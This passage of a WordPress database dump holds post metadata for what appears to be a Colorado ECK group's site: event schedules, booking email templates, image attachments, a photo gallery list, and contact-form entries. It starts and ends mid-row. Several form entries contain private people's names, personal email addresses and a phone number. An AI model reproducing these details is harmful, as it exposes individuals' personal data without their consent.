'mec_countdown_method','global'),(155203,266316,'mec_public','1'),(155204,266316,'mec_start_date','2022-03-20'),(155205,266316,'mec_start_time_hour','10'),(155206,266316,'mec_start_time_minutes','30'),(155207,266316,'mec_start_time_ampm','AM'),(155208,266316,'mec_start_day_seconds','37800'),(155209,266316,'mec_end_date','2022-03-20'),(155210,266316,'mec_end_time_hour','11'),(155211,266316,'mec_end_time_minutes','30'),(155212,266316,'mec_end_time_ampm','AM'),(155213,266316,'mec_end_day_seconds','41400'),(155214,266316,'mec_repeat_status','0'),(155215,266316,'mec_repeat_type',''),(155216,266316,'mec_repeat_interval','1'),(155217,266316,'mec_repeat_end',''),(155218,266316,'mec_repeat_end_at_occurrences',''),(155219,266316,'mec_repeat_end_at_date',''),(155220,266316,'mec_advanced_days','a:0:{}'),(155221,266316,'mec_in_days',''),(155222,266316,'mec_not_in_days',''),(155223,266316,'mec_hourly_schedules','a:0:{}'),(155224,266316,'mec_booking','a:19:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"bookings_minimum_per_booking\";s:1:\"1\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:29:\"bookings_booking_button_label\";s:0:\"\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(155225,266316,'mec_tickets','a:0:{}'),(155226,266316,'mec_fees_global_inheritance','1'),(155227,266316,'mec_fees','a:0:{}'),(155228,266316,'mec_ticket_variations_global_inheritance','1'),(155229,266316,'mec_ticket_variations','a:0:{}'),(155230,266316,'mec_reg_fields_global_inheritance','1'),(155231,266316,'mec_reg_fields','a:0:{}'),(155232,266316,'mec_bfixed_fields','a:0:{}'),(155233,266316,'mec_op','a:0:{}'),(155234,266316,'mec_fields','a:0:{}'),(155235,266316,'mec_event_status','EventScheduled'),(155236,266316,'mec_moved_online_link',''),(155237,266316,'mec_cancelled_reason',''),(155238,266316,'mec_display_cancellation_reason_in_single_page',''),(155239,266316,'boldgrid_hide_page_title','0'),(155240,266316,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(159655,266316,'boldgrid_in_page_containers','1'),(161622,266674,'mec_other_dates','a:0:{}'),(155241,266316,'passster_activate_global_protection',NULL),(155242,266316,'passster_activate_protection',NULL),(155243,266316,'passster_protection_type','password'),(155246,266316,'_dp_original','266308'),(155245,266316,'_thumbnail_id','266063'),(155247,266316,'_edit_lock','1693157208:2'),(155248,266316,'_edit_last','2'),(161165,266633,'mec_fees','a:0:{}'),(161166,266633,'mec_ticket_variations_global_inheritance','1'),(155252,266311,'_edit_last','2'),(161164,266633,'mec_fees_global_inheritance','1'),(155324,266318,'protect_children',''),(155325,266318,'mec_color',''),(155326,266318,'mec_location_id','118'),(155327,266318,'mec_dont_show_map','0'),(155328,266318,'mec_organizer_id','1'),(155329,266318,'mec_read_more',''),(155330,266318,'mec_more_info',''),(155331,266318,'mec_more_info_title',''),(155332,266318,'mec_more_info_target','_self'),(155333,266318,'mec_cost',''),(155334,266318,'mec_currency','a:0:{}'),(155335,266318,'mec_additional_organizer_ids','a:0:{}'),(155336,266318,'mec_additional_location_ids','a:0:{}'),(155337,266318,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-02-18\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-02-18\";s:4:\"hour\";s:2:\"12\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:7:{s:6:\"status\";s:1:\"1\";s:4:\"type\";s:8:\"advanced\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:5:\"Sat.3\";s:11:\"end_at_date\";s:0:\"\";s:3:\"end\";s:11:\"occurrences\";s:18:\"end_at_occurrences\";s:2:\"11\";}}'),(155338,266318,'mec_repeat','a:7:{s:6:\"status\";s:1:\"1\";s:4:\"type\";s:8:\"advanced\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:5:\"Sat.3\";s:11:\"end_at_date\";s:0:\"\";s:3:\"end\";s:11:\"occurrences\";s:18:\"end_at_occurrences\";s:2:\"11\";}'),(155339,266318,'mec_certain_weekdays','a:0:{}'),(155340,266318,'mec_allday','0'),(155341,266318,'one_occurrence','0'),(155342,266318,'mec_hide_time','0'),(155343,266318,'mec_hide_end_time','0'),(155344,266318,'mec_comment',''),(155345,266318,'mec_timezone','global'),(155346,266318,'mec_countdown_method','global'),(155347,266318,'mec_public','1'),(155348,266318,'mec_start_date','2023-02-18'),(155349,266318,'mec_start_time_hour','10'),(155350,266318,'mec_start_time_minutes','30'),(155351,266318,'mec_start_time_ampm','AM'),(155352,266318,'mec_start_day_seconds','37800'),(155353,266318,'mec_end_date','2023-02-18'),(155354,266318,'mec_end_time_hour','12'),(155355,266318,'mec_end_time_minutes','0'),(155356,266318,'mec_end_time_ampm','PM'),(155357,266318,'mec_end_day_seconds','43200'),(155358,266318,'mec_repeat_status','1'),(155359,266318,'mec_repeat_type','advanced'),(155360,266318,'mec_repeat_interval','1'),(155361,266318,'mec_repeat_end','occurrences'),(155362,266318,'mec_repeat_end_at_occurrences','10'),(155363,266318,'mec_repeat_end_at_date',''),(155364,266318,'mec_advanced_days','a:1:{i:0;s:5:\"Sat.3\";}'),(155365,266318,'mec_in_days',''),(155366,266318,'mec_not_in_days',''),(155367,266318,'mec_hourly_schedules','a:0:{}'),(155368,266318,'mec_booking','a:27:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"bookings_minimum_per_booking\";s:1:\"1\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_booking_button_label\";s:0:\"\";s:24:\"bookings_payable_inherit\";s:1:\"1\";s:16:\"bookings_payable\";s:3:\"100\";s:21:\"bookings_payable_type\";s:7:\"percent\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(155369,266318,'mec_tickets','a:0:{}'),(155370,266318,'mec_fees_global_inheritance','1'),(155371,266318,'mec_fees','a:0:{}'),(155372,266318,'mec_ticket_variations_global_inheritance','1'),(155373,266318,'mec_ticket_variations','a:0:{}'),(155374,266318,'mec_reg_fields_global_inheritance','1'),(155375,266318,'mec_reg_fields','a:0:{}'),(155376,266318,'mec_bfixed_fields','a:0:{}'),(155377,266318,'mec_op','a:0:{}'),(155378,266318,'mec_fields','a:0:{}'),(155379,266318,'mec_event_status','EventScheduled'),(155380,266318,'mec_moved_online_link',''),(155381,266318,'mec_cancelled_reason',''),(155382,266318,'mec_display_cancellation_reason_in_single_page',''),(155383,266318,'boldgrid_hide_page_title','0'),(155384,266318,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(176799,266318,'boldgrid_in_page_containers','1'),(176800,267897,'_menu_item_type','custom'),(176801,267897,'_menu_item_menu_item_parent','0'),(176802,267897,'_menu_item_object_id','267897'),(176803,267897,'_menu_item_object','custom'),(176804,267897,'_menu_item_target','_blank'),(176805,267897,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(155385,266318,'passster_activate_global_protection',NULL),(155386,266318,'passster_activate_protection',NULL),(155387,266318,'passster_protection_type','password'),(155389,266318,'_dp_original','266104'),(155390,266318,'_edit_lock','1690653395:2'),(155391,266318,'_edit_last','2'),(155392,266318,'_thumbnail_id','265135'),(156657,266405,'mec_location_id','122'),(156656,266405,'mec_color',''),(155393,266319,'_field_133','Anthony'),(155394,266319,'_field_134','Tolentino'),(155395,266319,'_field_135','kipthedogg@yahoo.com'),(155396,266319,'_field_137','Flashop Church Photography Program'),(155397,266319,'_field_138','My name is Anthony. I’m a photographer based in Colorado Springs representing a photography software called Flashop. I wanted to schedule a date/time to demo our program that would help create a profit center for your Church. We give you the tools to send your Church photography events with our photography delivery system. Your congregation can order prints, download church events to their phone and share on social media using our App. You keep 100% digital proceeds. Please contact me back to schedule a demo showing you how simple this program is. \n\nIncome Events including:\n\nYouth Group Trips\nYearly Family Photo Event\nDirectory Photos \nChurch School Photos \nOutdoor Missionary Trips\nKids Programs\nWeddings\nConfirmations \n\nTogether, we can continue to build a stronger community.\n\nThank you,\n\nAnthony Tolentino \nFlashop Photography Rep \n719-785-7206\nMyflashop.com\n \n\n'),(155398,266319,'_form_id','13'),(155399,266319,'_seq_num','99'),(155400,266320,'passster_protection_type','password'),(155401,266320,'passster_activate_protection',NULL),(155402,266320,'passster_activate_global_protection',NULL),(155403,266320,'mec_notifications','a:5:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:20:\"booking_confirmation\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"Your booking is confirmed.\";s:7:\"content\";s:243:\"<p>Hi %%name%%,</p>\r\n<p>Your booking is confirmed. You should be available at %%book_date%% in %%event_location_address%%.</p>\r\n<p>You can contact to event organizer by calling %%event_organizer_tel%%.</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:14:\"event_finished\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(155404,266320,'mec_display_cancellation_reason_in_single_page',''),(155405,266320,'mec_cancelled_reason',''),(155406,266320,'mec_moved_online_link',''),(155407,266320,'mec_event_status','EventScheduled'),(155408,266320,'mec_fields','a:0:{}'),(155409,266320,'mec_bfixed_fields','a:0:{}'),(155410,266320,'mec_public','1'),(155411,266320,'mec_countdown_method','global'),(155412,266320,'mec_timezone','global'),(155413,266320,'one_occurrence','0'),(155414,266320,'mec_additional_location_ids','a:0:{}'),(155415,266320,'mec_additional_organizer_ids','a:0:{}'),(155416,266320,'mec_currency','a:0:{}'),(155417,266320,'mec_cost',''),(155418,266320,'mec_more_info_target','_self'),(155419,266320,'mec_more_info_title',''),(155420,266320,'mec_more_info',''),(155421,266320,'mec_read_more',''),(155422,266320,'mec_event_date_submit','20210422105713'),(155423,266320,'mec_op','a:0:{}'),(155424,266320,'mec_reg_fields','a:0:{}'),(155425,266320,'mec_reg_fields_global_inheritance','1'),(155426,266320,'mec_ticket_variations','a:0:{}'),(155427,266320,'mec_ticket_variations_global_inheritance','1'),(155428,266320,'mec_fees','a:0:{}'),(155429,266320,'mec_fees_global_inheritance','1'),(155430,266320,'mec_tickets','a:0:{}'),(155431,266320,'mec_booking','a:0:{}'),(155432,266320,'mec_hourly_schedules','a:0:{}'),(155433,266320,'mec_not_in_days',''),(155434,266320,'mec_in_days',''),(155435,266320,'mec_repeat_type',''),(155436,266320,'mec_repeat_interval','1'),(155437,266320,'mec_repeat_end',''),(155438,266320,'mec_repeat_end_at_occurrences',''),(155439,266320,'mec_repeat_end_at_date',''),(155440,266320,'mec_advanced_days','a:0:{}'),(155441,266320,'mec_allday','0'),(155442,266320,'mec_hide_time','0'),(155443,266320,'mec_hide_end_time','0'),(155444,266320,'mec_comment',''),(155445,266320,'mec_repeat_status','0'),(155446,266320,'mec_certain_weekdays','a:0:{}'),(155447,266320,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(155448,266320,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2022-03-15\";s:4:\"hour\";s:1:\"7\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2022-03-15\";s:4:\"hour\";s:1:\"8\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(155449,266320,'protect_children',''),(155450,266320,'mec_color',''),(155451,266320,'mec_location_id','118'),(155452,266320,'mec_dont_show_map','1'),(155453,266320,'mec_organizer_id','1'),(155454,266320,'mec_start_date','2022-03-15'),(155455,266320,'mec_start_time_hour','7'),(155456,266320,'mec_start_time_minutes','0'),(155457,266320,'mec_start_time_ampm','PM'),(155458,266320,'mec_start_day_seconds','68400'),(155459,266320,'mec_end_date','2022-03-15'),(155460,266320,'mec_end_time_hour','8'),(155461,266320,'mec_end_time_minutes','0'),(155462,266320,'mec_end_time_ampm','PM'),(155463,266320,'mec_end_day_seconds','72000'),(155464,266320,'_dp_original','265756'),(155465,266320,'_edit_lock','1646352945:15'),(155466,266320,'_edit_last','15'),(155467,266321,'_wp_attached_file','2022/03/SpiritualExercises.webp'),(155468,266321,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:676;s:6:\"height\";i:380;s:4:\"file\";s:31:\"2022/03/SpiritualExercises.webp\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"SpiritualExercises-300x169.webp\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/webp\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"SpiritualExercises-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";}s:9:\"thumblist\";a:4:{s:4:\"file\";s:31:\"SpiritualExercises-300x300.webp\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/webp\";}s:16:\"meccarouselthumb\";a:4:{s:4:\"file\";s:31:\"SpiritualExercises-474x324.webp\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/webp\";}s:10:\"gridsquare\";a:4:{s:4:\"file\";s:31:\"SpiritualExercises-391x260.webp\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/webp\";}s:8:\"tileview\";a:4:{s:4:\"file\";s:31:\"SpiritualExercises-300x380.webp\";s:5:\"width\";i:300;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/webp\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:31:\"SpiritualExercises-450x250.webp\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/webp\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(155469,266320,'_thumbnail_id','266321'),(155470,266321,'smush-info','Failed with error code invalid_file_type - /home/eckank5/public_html/wp-content/uploads/2022/03/SpiritualExercises.webp - cannot be optimized, it has an invalid file type'),(155471,266321,'smush-complete',''),(155748,266362,'_field_425','Regina'),(155482,259639,'mec_location_id','0'),(155483,259639,'mec_additional_location_ids','a:0:{}'),(155484,259639,'mec_organizer_id','0'),(155485,259639,'mec_additional_organizer_ids','a:0:{}'),(159231,266537,'protect_children',''),(159230,266534,'_menu_item_url',''),(159220,266534,'passster_protection_type','password'),(159210,266532,'passster_activate_global_protection',NULL),(159209,266532,'protect_children',''),(159208,266532,'_wp_page_template','default'),(159199,266531,'_field_134','Parimuha'),(159200,266531,'_field_135','andjustbe@gmail.com'),(159198,266531,'_field_133','Lee'),(155499,266333,'_field_496','Anastasia'),(155500,266333,'_field_497','Anastasia'),(155501,266333,'_field_498',''),(155502,266333,'_field_499','anastasia.bissonnette@yahoo.com'),(155503,266333,'_field_500',''),(155504,266333,'_field_501',''),(155505,266333,'_field_502','Please Choose Your State'),(155506,266333,'_field_503','US'),(155507,266333,'_field_505','I saw a flyer that there are gatherings at 1:00p at the PLPOA clubhouse and then website says tomorrow online at 10:30a, but no link to sign-up or join so wondering how I can participate. Thank you 🙏🏼'),(155508,266333,'_form_id','53'),(155509,266333,'_seq_num','3'),(155510,266334,'_field_402','Susann'),(155511,266334,'_field_403','Arroyo'),(155512,266334,'_field_404','susanm.arroyo@yahoo.com'),(155513,266334,'_form_id','44'),(155514,266334,'_seq_num','23'),(155515,266335,'_field_425','Michael'),(155516,266335,'_field_426','Fischer'),(155517,266335,'_field_427','mfischerak@gmail.com'),(155518,266335,'_form_id','46'),(155519,266335,'_seq_num','40'),(193875,269228,'_field_654','Lillian'),(193874,269227,'_seq_num','82'),(193873,269227,'_form_id','61'),(169039,33553,'passster_activate_global_protection',NULL),(155531,266340,'_edit_last','2'),(155532,266340,'_edit_lock','1646605562:2'),(155533,266340,'modula-images','a:68:{i:0;a:10:{s:2:\"id\";s:6:\"125677\";s:3:\"alt\";s:0:\"\";s:5:\"title\";s:20:\"ECK_Temple_CO_030-lg\";s:11:\"description\";s:0:\"\";s:6:\"halign\";s:6:\"center\";s:6:\"valign\";s:6:\"middle\";s:4:\"link\";s:0:\"\";s:6:\"target\";i:0;s:5:\"width\";i:2;s:6:\"height\";i:2;}i:1;a:10:{s:2:\"id\";s:6:\"125676\";s:3:\"alt\";s:0:\"\";s:5:\"title\";s:20:\"ECK_Temple_CO_029-lg\";s:11:\"description\";s:0:\"\";s:6:\"halign\";s:6:\"center\";s:6:\"valign\";s:6:\"middle\";s:4:\"link\";s:0:\"\";s:6:\"target\";i:0;s:5:\"width\";i:2;s:6:\"height\";i:2;}i:2;a:10:{s:2:\"id\";s:6:\"125675\";s:3:\"alt\";s:0:\"\";s:5:\"title\";s:20:\"ECK_Temple_CO_027-lg\";s:11:\"description\";s:0:\"\";s:6:\"halign\";s:6:\"center\";s:6:\"valign\";s:6:\"middle\";s:4:\"link\";s:0:\"\";s:6:\"target\";i:0;s:5:\"width\";i:2;s:6:\"height\";i:2;}i:3;a:10:{s:2:\"id\";s:6:\"125674\";s:3:\"alt\";s:0:\"\";s:5:\"title\";s:20:\"ECK_Temple_CO_026-lg\";s:11:\"description\";s:0:\"\";s:6:\"halign\";s:6:\"center\";s:6:\"valign\";s:6:\"middle\";s:4:\"link\";s:0:\"\";s:6:\"target\";i:0;s:5:\"width\";i:2;s:6:\"height\";i:2;}i:4;a:10:{s:2:\"id\";s:6:\"125673\";s:3:\"alt\";s:0:\"\";s:5:\"title\";s:20:\"ECK_Temple_CO_025-lg\";s:11:\"description\";s:0:\"\";s:6:\"halign\";s:6:\"center\";s:6:\"valign\";s:6:\"middle\";s:4:\"link\";s:0:\"\";s:6:\"target\";i:0;s:5:\"width\";i:2;s:6:\"height\";i:2;}i:5;a:10:{s:2:\"id\";s:6:\"125672\";s:3:\"alt\";s:0:\"\";s:5:\"title\";s:20:\"ECK_Temple_CO_023-lg\";s:11:\"description\";s:0:\"\";s:6:\"halign\";s:6:\"center\";s:6:\"valign\";s:6:\"middle\";s:4:\"link\";s:0:\"\";s:6:\"target\";i:0;s:5:\"width\";i:2;s:6:\"height\";i:2;}i:6;a:10:{s:2:\"id\";s:6:\"125671\";s:3:\"alt\";s:0:\"\";s:5:\"title\";s:22:\"ECK_Temple_CO_023-A-lg\";s:11:\"description\";s:0:\"\";s:6:\"halign\";s:6:\"center\";s:6:\"valign\";s:6:\"middle\";s:4:\"link\";s:0:\"\";s:6:\"target\";i:0;s:5:\"width\";i:2;s:6:\"height\";i:2;}i:7;a:10:{s:2:\"id\";s:6:\"125670\";s:3:\"alt\";s:0:\"\";s:5:\"title\";s:20:\"ECK_Temple_CO_021-lg\";s:11:\"description\";s:0:\"\";s:6:\"halign\";s:6:\"center\";s:6:\"valign\";s:6:\"middle\";s:4:\"link\";s:0:\"\";s:6:\"target\";i:0;s:5:\"width\";i:2;s:6:\"height\";i:2;}i:8;a:10:{s:2:\"id\";s:6:\"125669\";s:3:\"alt\";s:0:\"\";s:5:\"title\";s:20:\"ECK_Temple_CO_020-lg\";s:11:\"description\";s:0:\"\";s:6:\"halign\";s:6:\"center\";s:6:\"valign\";s:6:\"middle\";s:4:\"link\";s:0:\"\";s:6:\"target\";i:0;s:5:\"width\";i:2;s:6:\"height\";i:2;}i:9;a:10:{s:2:\"id\";s:6:\"125668\";s:3:\"alt\";s:0:\"\";s:5:\"title\";s:20:\"ECK_Temple_CO_019-lg\";s:11:\"description\";s:0:\"\";s:6:\"halign\";s:6:\"center\";s:6:\"valign\";s:6:\"middle\";s:4:\"link\";s:0:\"\";s:6:\"target\";i:0;s:5:\"width\";i:2;s:6:\"height\";i:2;}i:10;a:10:{s:2:\"id\";s:6:\"125667\";s:3:\"alt\";s:0:\"\";s:5:\"title\";s:20:\"ECK_Temple_CO_018-lg\";s:11:\"description\";s:0:\"\";s:6:\"halign\";s:6:\"center\";s:6:\"valign\";s:6:\"middle\";s:4:\"link\";s:0:\"\";s:6:\"target\";i:0;s:5:\"width\";i:2;s:6:\"height\";i:2;}i:11;a:10:{s:2:\"id\";s:6:\"125666\";s:3:\"alt\";s:0:\"\";s:5:\"title\";s:20:\"ECK_Temple_CO_017-lg\";s:11:\"description\";s:0:\"\";s:6:\"halign\";s:6:\"center\";s:6:\"valign\";s:6:\"middle\";s:4:\"link\";s:0:\"\";s:6:\"target\";i:0;s:5:\"width\";i:2;s:6:\"height\";i:2;}i:12;a:10:{s:2:\"id\";s:6:\"125665\";s:3:\"alt\";s:0:\"\";s:5:\"title\";s:20:\"ECK_Temple_CO_016-lg\";s:11:\"description\";s:0:\"\";s:6:\"halign\";s:6:\"center\";s:6:\"valign\";s:6:\"middle\";s:4:\"link\";s:0:\"\";s:6:\"target\";i:0;s:5:\"width\";i:2;s:6:\"height\";i:2;}i:13;a:10:{s:2:\"id\";s:6:\"125664\";s:3:\"alt\";s:0:\"\";s:5:\"title\";s:22:\"ECK_Temple_CO_015-lg-o\";s:11:\"description\";s:0:\"\";s:6:\"halign\";s:6:\"center\";s:6:\"valign\";s:6:\"middle\";s:4:\"link\";s:0:\"\";s:6:\"target\";i:0;s:5:\"width\";i:2;s:6:\"height\";i:2;}i:14;a:10:{s:2:\"id\";s:6:\"125663\";s:3:\"alt\";s:0:\"\";s:5:\"title\";s:20:\"ECK_Temple_CO_014-lg\";s:11:\"description\";s:0:\"\";s:6:\"halign\";s:6:\"center\";s:6:\"valign\";s:6:\"middle\";s:4:\"link\";s:0:\"\";s:6:\"target\";i:0;s:5:\"width\";i:2;s:6:\"height\";i:2;}i:15;a:10:{s:2:\"id\";s:6:\"125662\";s:3:\"alt\";s:0:\"\";s:5:\"title\";s:20:\"ECK_Temple_CO_013-lg\";s:11:\"description\";s:0:\"\";s:6:\"halign\";s:6:\"center\";s:6:\"valign\";s:6:\"middle\";s:4:\"link\";s:0:\"\";s:6:\"target\";i:0;s:5:\"width\";i:2;s:6:\"height\";i:2;}i:16;a:10:{s:2:\"id\";s:6:\"125661\";s:3:\"alt\";s:0:\"\";s:5:\"title\";s:20:\"ECK_Temple_CO_012-lg\";s:11:\"description\";s:0:\"\";s:6:\"halign\";s:6:\"center\";s:6:\"valign\";s:6:\"middle\";s:4:\"link\";s:0:\"\";s:6:\"target\";i:0;s:5:\"width\";i:2;s:6:\"height\";i:2;}i:17;a:10:{s:2:\"id\";s:6:\"125660\";s:3:\"alt\";s:0:\"\";s:5:\"title\";s:20:\"ECK_Temple_CO_011-lg\";s:11:\"description\";s:0:\"\";s:6:\"halign\";s:6:\"center\";s:6:\"valign\";s:6:\"middle\";s:4:\"link\";s:0:\"\";s:6:\"target\";i:0;s:5:\"width\";i:2;s:6:\"height\";i:2;}i:18;a:10:{s:2:\"id\";s:6:\"125659\";s:3:\"alt\";s:0:\"\";s:5:\"title\";s:20:\"ECK_Temple_CO_009-lg\";s:11:\"description\";s:0:\"\";s:6:\"halign\";s:6:\"center\";s:6:\"valign\";s:6:\"middle\";s:4:\"link\";s:0:\"\";s:6:\"target\";i:0;s:5:\"width\";i:2;s:6:\"height\";i:2;}i:19;a:10:{s:2:\"id\";s:6:\"125658\";s:3:\"alt\";s:0:\"\";s:5:\"title\";s:20:\"ECK_Temple_CO_008-lg\";s:11:\"description\";s:0:\"\";s:6:\"halign\";s:6:\"center\";s:6:\"valign\";s:6:\"middle\";s:4:\"link\";s:0:\"\";s:6:\"target\";i:0;s:5:\"width\";i:2;s:6:\"height\";i:2;}i:20;a:10:{s:2:\"id\";s:6:\"125657\";s:3:\"alt\";s:0:\"\";s:5:\"title\";s:20:\"ECK_Temple_CO_007-lg\";s:11:\"description\";s:0:\"\";s:6:\"halign\";s:6:\"center\";s:6:\"valign\";s:6:\"middle\";s:4:\"link\";s:0:\"\";s:6:\"target\";i:0;s:5:\"width\";i:2;s:6:\"height\";i:2;}i:21;a:10:{s:2:\"id\";s:6:\"125656\";s:3:\"alt\";s:0:\"\";s:5:\"title\";s:20:\"ECK_Temple_CO_006-lg\";s:11:\"description\";s:0:\"\";s:6:\"halign\";s:6:\"center\";s:6:\"valign\";s:6:\"middle\";s:4:\"link\";s:0:\"\";s:6:\"target\";i:0;s:5:\"width\";i:2;s:6:\"height\";i:2;}i:22;a:10:{s:2:\"id\";s:6:\"125655\";s:3:\"alt\";s:0:\"\";s:5:\"title\";s:20:\"ECK_Temple_CO_005-lg\";s:11:\"description\";s:0:\"\";s:6:\"halign\";s:6:\"center\";s:6:\"valign\";s:6:\"middle\";s:4:\"link\";s:0:\"\";s:6:\"target\";i